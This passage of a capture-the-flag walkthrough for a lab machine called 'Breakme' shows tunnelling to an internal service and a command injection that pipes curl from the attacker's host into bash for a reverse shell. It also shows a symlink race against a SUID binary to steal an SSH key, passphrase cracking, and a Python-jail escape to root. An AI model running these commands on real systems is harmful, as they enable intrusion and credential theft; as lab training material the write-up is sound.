Proto Recv-Q Send-Q Local Address    Foreign Address   State   PID/Program name    
tcp        0      0 127.0.0.1:3306   0.0.0.0:*         LISTEN      -
tcp        0      0 127.0.0.1:9999   0.0.0.0:*         LISTEN      -
tcp        0      0 0.0.0.0:22       0.0.0.0:*         LISTEN      -
tcp6       0      0 :::80            :::*              LISTEN      -
tcp6       0      0 :::22            :::*              LISTEN      -
udp        0      0 0.0.0.0:68       0.0.0.0:*                     -   

This seems to be another site, possibly an entry point to user john.

www-data@Breakme:/tmp$ curl 127.0.0.1:9999
<html>
<head>
        <title>Test</title>
        <style>
                .checkTarget{
                        position:absolute;
                        width:calc(30%);
                        height:450px;
                        top:calc(10%);
                        left:calc(2.5%);
                        border:3px solid green;
                        border-radius:5%;
                        background-color:rgb(180,220,180);
                        text-align:center;
                }
                .checkUser{
                        position:absolute;
                        width:calc(30%);
                        height:450px;
                        top:calc(10%);
                        left:calc(35%);
                        border:3px solid green;
                        border-radius:5%;
                        background-color:rgb(180,220,180);
                        text-align:center;
                }
                .checkFile{
                        position:absolute;
                        width:calc(30%);
                        height:450px;
                        top:calc(10%);
                        left:calc(67.5%);
                        border:3px solid green;
                        border-radius:5%;
                        background-color:rgb(180,220,180);
                        text-align:center;
                }
                body{
                        background-color:rgb(200,200,200);
                }
                pre{
                        white-space:pre-wrap;
                        word-wrap:break-word;
                        overflow:auto;
                        width:calc(100%);
                        height:180px;
                        text-align:center;
                }
                .output{
                        width:calc(100%);
                        text-align:center;
                }
        </style>
</head>
<body>
        



        <h1 style="color:rgb(50,100,50);">My Tools:</h1>
        <!--Only numerical IPs allowed -->
        <div class="container">
        <form class="checkTarget" method="POST">
                <h3>Check Target:</h3>
                <input name="cmd1" style="border-radius:5%;border:3px solid green;height:30px" type="text" placeholder="Target IP" /><br><br>
                <input style="width:70px" type="submit" value="Run" /><br><br><br>
                <h3>Result:</h3><br>
                <div class="output"><pre></pre></div>
        </form>
        <form class="checkUser" method="POST">
                <h3>Check User:</h3>
                <input name="cmd2" style="border-radius:5%;border:3px solid green;height:30px" type="text" placeholder="User name" /><br><br>
                <input style="width:70px" type="submit" value="Run" /><br><br><br>
                <h3>Result:</h3><br>
                <div class="output"><pre></pre></div>
        </form>
        <form class="checkFile" method="POST">
                <h3>Check File:</h3>
                <input name="cmd3" style="border-radius:5%;border:3px solid green;height:30px" type="text" placeholder="File name" /><br><br>
                <input style="width:70px" type="submit" value="Run" /><br><br><br>
                <h3>Result:</h3>
                <div class="output"><pre></pre></div>
        </form>
        </div>
</body>
</html>

Before we continue, let's take a look at possible processes running in the background using Pspy. Here we see that the service is a web server running in the context of the user with the uid 1002.

This is our user john.

We now want to investigate the service on port 9999 further. To do this, we create a tunnel using Ligolo-ng to gain access to it.

Setup Ligolo-ng

GitHub - nicocha30/ligolo-ng: An advanced, yet simple, tunneling/pivoting tool that uses a TUN interface.GitHub

First, we set up a TUN (network tunnel) interface named "ligolo" and configuring routes to forward traffic for 240.0.0.1 through the tunnel.

┌──(kali㉿kali)-[~]
└─$ sudo ip tuntap add user 0xb0b mode tun ligolo
[sudo] password for kali: 
                        
┌──(kali㉿kali)-[~]
└─$ sudo ip link set ligolo up 

┌──(kali㉿kali)-[~]
└─$ sudo ip route add 240.0.0.1 dev ligolo

Next, we download the latest release of ligolo-ng. The proxy and the agent are in the amd64 version.

Release Ligolo-ng v0.7.2-alpha · nicocha30/ligolo-ngGitHub

On our attack machine, we start the proxy server.

./proxy -selfcert

Next on the target machine we start the agent to connect to our proxy.

./agent -connect 10.8.211.1:11601 --ignore-cert

We receive a message on our ligolo-ng proxy that an agent has joined. We select the session using session and then start it.

We are now able to reach internal port 9999 via the address 240.0.0.1.

Here we have a page with tools that include a check target, a check user and check file. This suggests that some kind of command injection could be possible.

If we enter our IP at Check Target, we find that a ping is actually executed. The input only allows the numerical representation of IP addresses.

Check user reflects the entries you have made. However, we cannot find a valid user, not even under the known john, bob or www-data.

The file check does not seem to find any files either. Special characters or numbers do not seem to be permitted here.

We enter a set of special characters in Check User and see that a small set is reflected. Not everything is removed. We also notice that the space character is removed.

Copy

!@#$%^&*()_+-={}[]|:;'"<>,.?/

With the character set of special characters that we determined earlier, we can try the following command injection. We use the ${IFS} variable to replace the space, pipe that ping command to the previous command as output.

|ping${IFS}10.17.15.155

We then capture the pings via tcpdump and see that our command injection was successful.

Next, we prepare a simple reverse shell payload. Since we can't use & we use curl to distribute our reverse shell and execute it in the same command.

Then we set up a Python web server to provide the payload.

We replace our ping with a curl command, to see if we can successfully request the payload.

Copy

|curl${IFS}http://10.17.15.155/payload.sh

Now we set up a listener on port 4446 and adapt our command with a pipe to bash.

|curl${IFS}http://10.17.15.155/payload.sh|bash

This gives us our first flag.

Reverse Shell as Youcef

In the home directory of youcef we find that we have access to other files, including readfile.

We want to take a closer look at the files and set up a python web server in the home directory to access these.

Initially, we decompile the readfile binary since we lack access to readfile.c. This binary has the SUID bit set, allowing us to read files with the privileges of its owner, Youcef. We hope to retrieve Youcef's SSH key. However, attempts to read the file result in a "file not found" error, and our access to readfile.c returns a Nice Try! message, indicating restrictions in place.

After decompiling the binary, we discover that it includes checks to verify if the user is john by searching for the UID. It also prevents access to specific filenames like flag and id_rsa, resulting in a Nice Try! message if those are attempted. Additionally, the program checks for symlinks, which if opened, also fail, along with any files to which user john does not have access.

The application first checks if an argument is supplied, otherwise it exits with a usage message. It then verifies if the file exists, exits if it doesn't, and ensures the user is running with UID 1002 (john). If the filename contains flag or id_rsa, or is a symlink, access is denied. However, if the file passes these checks, the program waits briefly (usleep) before opening and printing the file. This delay introduces a race condition, allowing exploitation between the file check and access (TOCTOU vulnerability).

Race Condition

To exploit the race condition vulnerability, we can create a regular file and rapidly toggle it between a regular file and a symlink pointing to the desired file (e.g., youcef’s file). The goal is that during the application's check, it detects the regular file and allows access. But by the time the program opens and reads the file, the symlink points to the target file we wish to access, bypassing the restrictions.

For this, we will first use a loop to constantly switch the file between these two states and run it in the background.

while true; do ln -sf /home/youcef/.ssh/id_rsa symlink; rm symlink; touch symlink; done &

Now, we will create another loop that continuously runs the program, hoping to win the race condition. If we succeed, it will print the output and exit.

for i in {1..30}; do /home/youcef/readfile symlink; done

As we can see, after a while, we win the race and manage to read /home/youcef/.ssh/id_rsa.

SSH Connection

Now that we have the SSH key, we encounter an additional obstacle: the key is encrypted with a passphrase. To gain access, we will need to crack or bypass this passphrase in order to use the SSH key and establish a shell on the target system.

┌──(kali㉿kali)-[~/Desktop/Transfer]
└─$ ssh -i id_rsa youcef@breakme.thm
Enter passphrase for key 'id_rsa':

We can attempt to brute-force the passphrase. First, we need to convert the SSH key into a format that John the Ripper can work with.

$ ssh2john id_rsa > ssh_key.hash

We do this using the ssh2john utility, which transforms the SSH private key into a hash that John the Ripper can recognize and attempt to crack.

After converting the key, we can run John to start brute-forcing the passphrase and potentially gain access to the decrypted SSH key.

Now, using john to crack it, we obtain the passphrase.

┌──(kali㉿kali)-[~/Desktop/Transfer]
└─$ john ssh_key.hash --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 2 for all loaded hashes
Cost 2 (iteration count) is 16 for all loaded hashes
Will run 6 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:00:06 0.00% (ETA: 2024-10-10 21:56) 0g/s 53.50p/s 53.50c/s 53.50C/s cancer..michael1
[REDACTED]          (id_rsa)     
1g 0:00:00:12 DONE (2024-10-07 16:28) 0.07782g/s 52.29p/s 52.29c/s 52.29C/s gracie..kelly
Use the "--show" option to display all of the cracked passwords reliably
Session completed. 

Using the SSH key and the passphrase we found, we successfully access the system as the user "youcef."

With this shell access, we can now explore the system further and locate the second flag.

By having control over the "youcef" account, we can read files and execute commands under this user, allowing us to progress further in the challenge.

┌──(kali㉿kali)-[~/Desktop/Transfer]
└─$ ssh -i id_rsa youcef@breakme.thm                             
Enter passphrase for key 'id_rsa': 
Linux Breakme 5.10.0-8-amd64 #1 SMP Debian 5.10.46-4 (2021-08-03) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Thu Mar 21 07:55:16 2024 from 192.168.56.1
youcef@Breakme:~$ id
uid=1000(youcef) gid=1000(youcef) groups=1000(youcef)

This gives us our 2nd flag.

Privilege Escalation

youcef@Breakme:~$ sudo -l
Matching Defaults entries for youcef on breakme:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User youcef may run the following commands on breakme:
    (root) NOPASSWD: /usr/bin/python3 /root/jail.py

Executing the program reveals that we are operating within a Python jail, which prompts us for input.

youcef@Breakme:~$ sudo /usr/bin/python3 /root/jail.py
  Welcome to Python jail  
  Will you stay locked forever  
  Or will you BreakMe  
>> 

Upon testing the input, we discover that entering invalid Python code triggers a "Wrong Input" message. .

youcef@Breakme:~$ sudo /usr/bin/python3 /root/jail.py
  Welcome to Python jail  
  Will you stay locked forever  
  Or will you BreakMe  
>> test
Wrong Input
>> 

When we input valid Python code, it executes successfully, indicating that our input is likely being passed directly to the exec function.

youcef@Breakme:~$ sudo /usr/bin/python3 /root/jail.py
  Welcome to Python jail  
  Will you stay locked forever  
  Or will you BreakMe  
>> test
Wrong Input
>> print(hello)
Wrong Input
>> print('hello')
hello
>> 

However, if we try to import a module to run commands, we see the message Illegal Input and the program exits. This indicates that there must be some filtering in place.

>> import os
Illegal Input
youcef@Breakme:~$ 

Since directly spawning a shell or utilizing typical programs for this purpose is restricted, we should explore alternative methods to gain shell access. We might consider leveraging scripting techniques, utilizing file redirection, or finding executables that allow indirect access. Exploring environment variables or existing permissions could also present opportunities for executing commands that would lead to a shell.

Looking for common Python jail bypass payloads, we find the following payload here. It imports the os module and calls the system function from it:

• __builtins__.__import__("os").system("ls")

But, if we try it in our case, we see that it fails.

>> __builtins__.__import__("os").system("ls")
Illegal Input

To begin our exploration, we first attempt to access the import function using __builtins__.__import__. However, we quickly discover that this functionality is restricted.

>> __builtins__.__import__
Illegal Input

By breaking down our payload and testing its individual components, we determine that the problem originates from the __import__ function and the quotation marks.

>> __builtins__
>> __import__
Illegal Input
>> "
Illegal Input

To bypass the issue with quotation marks, we can use single quotes (').

For the __import__ function, instead of calling it directly as __builtins__.__import__, we can access it through the dictionary method with __builtins__.__dict__['__import__'].

This approach allows us to provide __import__ as a string, which we can manipulate using various string methods to circumvent filters. For instance, the application accepts __IMPORT__, enabling us to modify it to __import__.

For instance, we see that the application has no issue with __IMPORT__.

>> __IMPORT__
Wrong Input

We can utilize __IMPORT__ and then apply a method to convert it to __import__. One method we can use is lower(), which transforms all uppercase letters into lowercase.

>> __builtins__.__dict__['__IMPORT__'.lower()]
Illegal Input

Testing the parts of our input once more, we find that lower is also not allowed.

>> __builtins__
>> __dict__
Wrong Input
>> []
>> ()
>> '
Wrong Input
>> __IMPORT__
Wrong Input
>> lower
Illegal Input

Looking for alternatives to the lower method, we find the casefold method, which serves a similar purpose. As we can see, this method is not filtered and works.

>> print(__builtins__.__dict__['__IMPORT__'.casefold()])
<built-in function __import__>

Returning to our payload, we find that when we attempt to import the os module, it is also not allowed, and we can see the reason why: os is filtered as well.

>> __builtins__.__dict__['__IMPORT__'.casefold()]('os')
Illegal Input
>> os
Illegal Input

Since os is already supplied as a string and OS is not filtered, we can use the casefold method once more to bypass it.

As we can see, this works, and we are able to access the os module

>> print(__builtins__.__dict__['__IMPORT__'.casefold()]('OS'.casefold()))
<module 'os' from '/usr/lib/python3.9/os.py'>

However, if we try to access the system function, we find that we fail once more.

>> __builtins__.__dict__['__IMPORT__'.casefold()]('OS'.casefold()).system
Illegal Input

This time, it’s because system is filtered.

>> system
Illegal Input

Now, we can use __dict__ once more to be able to use system as a string and apply the casefold method to bypass the filter.

As we can see, this allows us to access the system function successfully.

>> print(__builtins__.__dict__['__IMPORT__'.casefold()]('OS'.casefold()).__dict__['SYSTEM'.casefold()])
<built-in function system>

By using the payload __builtins__.__dict__['__IMPORT__'.casefold()]('OS'.casefold()).__dict__['SYSTEM'.casefold()]('/lib/yorick/bin/yorick'), we can spawn the Yorick interpreter. Once inside the Yorick environment, we can execute the command system "bash" to launch a shell as the root user. This allows us to access and read the third flag, leveraging the vulnerabilities in the Python execution context.

youcef@Breakme:~$ sudo /usr/bin/python3 /root/jail.py
  Welcome to Python jail
  Will you stay locked forever
  Or will you BreakMe
>> __builtins__.__dict__['__IMPORT__'.casefold()]('OS'.casefold()).__dict__['SYSTEM'.casefold()]('/lib/yorick/bin/yorick')

 Copyright (c) 2005.  The Regents of the University of California.
 All rights reserved.  Yorick 2.2.04 ready.  For help type 'help'
> system, "bash"
root@Breakme:/home/youcef# cd ~
root@Breakme:~# id
uid=0(root) gid=0(root) groups=0(root)

We get our root flag.